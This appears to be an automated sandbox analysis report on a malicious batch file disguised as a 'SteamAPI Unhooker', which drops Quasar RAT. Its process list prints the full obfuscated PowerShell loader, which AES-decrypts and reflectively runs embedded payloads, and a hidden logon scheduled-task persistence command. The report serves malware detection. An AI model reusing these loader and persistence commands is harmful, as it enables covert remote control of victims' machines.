Analysis Overview
SHA256
3ff8b6a041a96625d730dfe770eb6e84be8ce99fc50a0027724e48394f053308
Threat Level: Known bad
The file SteamAPI Unhooker.bat was found to be: Known bad.
Malicious Activity Summary
Quasar RAT
Quasar payload
Suspicious use of NtCreateUserProcessOtherParentProcess
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Sets service image path in registry
Checks computer location settings
Checks BIOS information in registry
Executes dropped EXE
Looks up external IP address via web service
Suspicious use of SetThreadContext
Drops file in System32 directory
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Checks processor information in registry
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Enumerates system info in registry
Uses Task Scheduler COM API
Runs ping.exe
Creates scheduled task(s)
Suspicious use of SetWindowsHookEx
Suspicious use of UnmapMainImage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-28 13:52
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-28 13:52
Reported
2024-05-28 13:58
Platform
win10-20240404-en
Max time kernel
300s
Max time network
256s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4072 created 580 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | c:\windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6D1A73D92C4DC2751A4B5A2404E1BDCC | c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 | c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | c:\windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9C237ECACBCB4101A3BE740DF0E53F83 | c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx | c:\windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4072 set thread context of 1056 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\SCHTASKS.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 28 May 2024 13:54:19 GMT" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={68B30AEA-E7BA-4E60-8A91-D01B9BF16C6E}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1716904458" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
c:\windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgent.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SteamAPI Unhooker.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F+5wamWtVzd3aK2bnS7nWh4XV0PZc2pVZ9YG0yRK5cI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lnHVCKXb70Ny+fnCAwMhpw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fLkgt=New-Object System.IO.MemoryStream(,$param_var); $wtCVF=New-Object System.IO.MemoryStream; $XRlUB=New-Object System.IO.Compression.GZipStream($fLkgt, [IO.Compression.CompressionMode]::Decompress); $XRlUB.CopyTo($wtCVF); $XRlUB.Dispose(); $fLkgt.Dispose(); $wtCVF.Dispose(); $wtCVF.ToArray();}function execute_function($param_var,$param2_var){ $PEWwL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iVLBa=$PEWwL.EntryPoint; $iVLBa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\SteamAPI Unhooker.bat';$OJTBF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\SteamAPI Unhooker.bat').Split([Environment]::NewLine);foreach ($Wvrxg in $OJTBF) { if ($Wvrxg.StartsWith(':: ')) { $TvDjF=$Wvrxg.Substring(3); break; }}$payloads_var=[string[]]$TvDjF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_817_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_817.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_817.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_817.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
